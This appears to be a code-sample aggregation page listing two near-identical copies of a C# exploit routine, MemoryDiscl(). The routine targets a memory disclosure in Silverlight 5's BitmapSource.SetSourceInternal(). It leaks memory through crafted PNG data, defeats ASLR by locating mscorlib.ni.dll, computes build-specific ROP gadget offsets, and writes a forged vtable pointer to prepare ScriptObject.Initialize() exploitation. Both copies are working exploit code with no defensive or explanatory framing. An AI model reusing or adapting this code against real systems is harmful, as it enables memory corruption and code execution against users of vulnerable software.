예제 #1
0
        // exploits memory disclosure in BitmapSource.SetSourceInternal()
        ulong MemoryDiscl()
        {
            try
            {
                // prepare malicious MemoryStream
                MyStream ms = new MyStream();

                // create image based on stream data and data "outside" the stream
                BitmapImage bi = new BitmapImage();
                ms.offs = 39;           // set offset for 32 bit environment
                bi.SetSource(ms);       // call the vulnerable SetSourceInternal()

                // check png data parsing results
                is64 = bi.PixelWidth == 0 || bi.PixelHeight == 0;
                if (is64)   // error, ok lets try again with the offset for 64 bit
                {
                    ms.offs = 79;
                    bi.SetSource(ms);
                }

                // check png data parsing results
                if (bi.PixelWidth == 0 || bi.PixelHeight == 0)
                {
                    throw new Exception("Bad PNG data");                                            // error png parsing
                }
                // ok, now we should pass the diclosed memory into WriteableBitmap to access it as RGB pixel data
                WriteableBitmap wb = new WriteableBitmap(bi);
                LogAdd(wb);

                // read pixels from image
                int[] p   = wb.Pixels;
                int   len = p.Length;
                LogAdd(String.Format("pixels available to read: {0}", len));
                string s = " ";
                for (int i = 0; i < len; i++)
                {
                    s = p[i].ToString("X").Substring(2);
                    LogAdd(String.Format("pixel[{0}] = {1}", i, s));
                }

                // convert int[] to byte[]
                byte[] b = new byte[len * 3];
                int    k;
                for (int i = is64 ? 5:2, j = 0; i < len; i++, j += 3)
                {
                    k        = p[i] & 0xffffff;
                    b[j + 2] = (byte)(k & 0xff); k >>= 8;
                    b[j + 1] = (byte)(k & 0xff); k >>= 8;
                    b[j + 0] = (byte)(k & 0xff); k >>= 8;
                }

                // parse memory addresses from b[]
                ulong hMod  = ReadAddr(b, is64 ?  0:1);         // type pointer for obj[] // we'll need it for mscorlib.ni.dll image base calculation for the ASLR bypass
                ulong addr1 = ReadAddr(b, is64 ? 24:13);        // obj[0] = address of png[]
                bufAddr = ReadAddr(b, is64 ? 32:17);            // obj[1] = address of MainPage.inst.buf[]

                LogAdd("obj[] type = " + Hex(hMod) + ",  png[] address = " + Hex(addr1) + ",  buf[] address = " + Hex(bufAddr));

                // calc the ROP offset inside mscorlib.ni.dll
                // * x86
                // 7997526b 83493440        or      dword ptr [ecx+34h],40h
                // 7997526f b801000000      mov     eax,1
                // 79975274 c20400          ret     4
                // * x64
                // 000007fe`f03e19d0 895168          mov     dword ptr [rcx+68h],edx
                // 000007fe`f03e19d3 c3              ret
                if (Environment.OSVersion.Platform != PlatformID.Win32NT)
                {
                    throw new Exception("Sorry, but the further code works for Windows only.");
                }
                ulong rop = 0;
                if (vsn.Major == 5 && vsn.Build == 10411)
                {
                    rop = (hMod & 0xffffffffffff0000) - (ulong)(is64 ? 0x670000 - 0x4519D0 : 0x470000 - 0x2A526B);
                }
                else if (vsn.Major == 5 && vsn.Build == 61118)
                {
                    rop = (hMod & 0xffffffffffff0000) - (ulong)(is64 ? 0x670000 - 0x4519D0 : 0x470000 - 0x2A520F);
                }

                if (rop == 0)
                {
                    throw new Exception("Sorry, but the further code works for vulnerable 5 builds only.");
                }

                // calc object pointer offset inside png2[]
                ulong addr2 = bufAddr - (ulong)(is64 ? 96:45);
                k = (int)(addr2 - addr1) - (is64 ? 16:8);

                // write vtable pointer
                WriteAddr(ms.png, k, addr2);
                // write address of ROP gadget
                WriteAddr(ms.png, k + (is64 ? 8:4), rop);

                // ok, return the pointer for ScriptObject.Initialize() exploitation
                return(addr2);
            }
            catch (Exception ex)
            {
                LogAdd("Error: " + ex.ToString());
            }

            return(0);
        }
예제 #2
0
        // exploits memory disclosure in BitmapSource.SetSourceInternal()
        ulong MemoryDiscl()
        {
            try
            {
                // prepare malicious MemoryStream
                MyStream ms = new MyStream();
 
                // create image based on stream data and data "outside" the stream
                BitmapImage bi = new BitmapImage();	
                ms.offs = 39;		// set offset for 32 bit environment
                bi.SetSource(ms);	// call the vulnerable SetSourceInternal()

                // check png data parsing results
                is64 = bi.PixelWidth == 0 || bi.PixelHeight == 0;
                if (is64) { // error, ok lets try again with the offset for 64 bit
                    ms.offs = 79; 
                    bi.SetSource(ms);
                }

                // check png data parsing results
                if (bi.PixelWidth == 0 || bi.PixelHeight == 0) throw new Exception("Bad PNG data"); // error png parsing

                // ok, now we should pass the diclosed memory into WriteableBitmap to access it as RGB pixel data
                WriteableBitmap wb = new WriteableBitmap(bi);
                LogAdd(wb);

                // read pixels from image
                int[] p = wb.Pixels;
                int len = p.Length;
                LogAdd(String.Format("pixels available to read: {0}", len));
                string s = " ";
                for (int i = 0; i < len; i++) {
                    s = p[i].ToString("X").Substring(2);
                    LogAdd(String.Format("pixel[{0}] = {1}", i, s));
                }

                // convert int[] to byte[]
                byte[] b = new byte[len * 3];
                int k;
                for (int i = is64 ? 5:2, j=0; i < len; i++, j+=3)
                {    
                    k = p[i] & 0xffffff;
                    b[j + 2] = (byte)(k & 0xff); k >>= 8;
                    b[j + 1] = (byte)(k & 0xff); k >>= 8;
                    b[j + 0] = (byte)(k & 0xff); k >>= 8;
                }

                // parse memory addresses from b[]
                ulong hMod  = ReadAddr(b, is64 ?  0:1);		// type pointer for obj[] // we'll need it for mscorlib.ni.dll image base calculation for the ASLR bypass
                ulong addr1 = ReadAddr(b, is64 ? 24:13);	// obj[0] = address of png[]
                bufAddr     = ReadAddr(b, is64 ? 32:17);	// obj[1] = address of MainPage.inst.buf[]

                LogAdd("obj[] type = " + Hex(hMod) + ",  png[] address = " + Hex(addr1) + ",  buf[] address = " + Hex(bufAddr));

                // calc the ROP offset inside mscorlib.ni.dll
                // * x86
                // 7997526b 83493440        or      dword ptr [ecx+34h],40h
                // 7997526f b801000000      mov     eax,1
                // 79975274 c20400          ret     4
                // * x64
                // 000007fe`f03e19d0 895168          mov     dword ptr [rcx+68h],edx
                // 000007fe`f03e19d3 c3              ret
                if (Environment.OSVersion.Platform != PlatformID.Win32NT) throw new Exception("Sorry, but the further code works for Windows only.");
                ulong rop = 0;
                if (vsn.Major == 5 && vsn.Build == 10411) 
                {
                    rop = (hMod & 0xffffffffffff0000) - (ulong)(is64 ? 0x670000 - 0x4519D0 : 0x470000 - 0x2A526B);
                }
                else if (vsn.Major == 5 && vsn.Build == 61118) 
                {
                    rop = (hMod & 0xffffffffffff0000) - (ulong)(is64 ? 0x670000 - 0x4519D0 : 0x470000 - 0x2A520F);
                } 

                if (rop == 0) throw new Exception("Sorry, but the further code works for vulnerable 5 builds only.");

                // calc object pointer offset inside png2[]
                ulong addr2 = bufAddr - (ulong)(is64 ? 96:45);
                k = (int)(addr2 - addr1) - (is64 ? 16:8);

                // write vtable pointer
                WriteAddr(ms.png, k, addr2);
                // write address of ROP gadget
                WriteAddr(ms.png, k + (is64 ? 8:4), rop);

                // ok, return the pointer for ScriptObject.Initialize() exploitation
                return addr2;
            }
            catch (Exception ex)
            {
                LogAdd("Error: " + ex.ToString());
            }

            return 0;
        }